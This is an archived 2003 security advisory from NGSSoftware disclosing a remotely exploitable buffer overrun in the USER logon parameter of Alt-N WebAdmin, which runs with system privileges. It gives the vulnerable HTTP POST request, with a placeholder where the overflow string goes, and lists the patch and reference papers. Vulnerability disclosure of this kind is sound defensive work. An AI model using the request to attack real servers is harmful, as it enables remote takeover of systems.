NGSSoftware Insight Security Research Advisory Name: Remote System Buffer Overrun WebAdmin.exe Systems Affected: Windows Severity: High Risk Category: Buffer Overrun Vendor URL: http://www.altn.com/ Author: Mark Litchfield (markat_private) Date: 24th June 2003 Advisory number: #NISR2406-03 Description *********** WebAdmin allows administrators to securely manage MDaemon, RelayFax, and WorldClient from anywhere in the world Details ******* There is a remotely exploitable buffer overrun in the USER parameter. By default the webadmin.exe process is started as a system service. Any code being passed to the server by an attacker as a result of this buffer overrun would therefore (based on a default install) execute with system privileges. POST /WebAdmin.dll?View=Logon HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://ngssoftware.com:1000/ Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: MyUser Agent Host: NGSSoftware.com Content-Length: 74 Connection: Keep-Alive Cache-Control: no-cache Cookie: User=NGSSOFTWARE; Lang=en; Theme=Standard User=LONGSTRING&Password=foo&languageselect=en&Theme=Heavy&Logon=Sign+In Fix Information *************** NGSSoftware alerted ALTN to theses issues on the 19th of June 2003. A patch has now been made available from ftp://ftp.altn.com/WebAdmin/Release/wa205_en.exe A check for these issues has been added to Typhon III, of which more information is available from the NGSSoftware website, http://www.ngssoftware.com Further Information ******************* For further information about the scope and effects of buffer overflows, please see http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf http://www.ngssoftware.com/papers/ntbufferoverflow.html http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf http://www.ngssoftware.com/papers/unicodebo.pdf
This archive was generated by hypermail 2b30 : Tue Jun 24 2003 - 09:11:16 PDT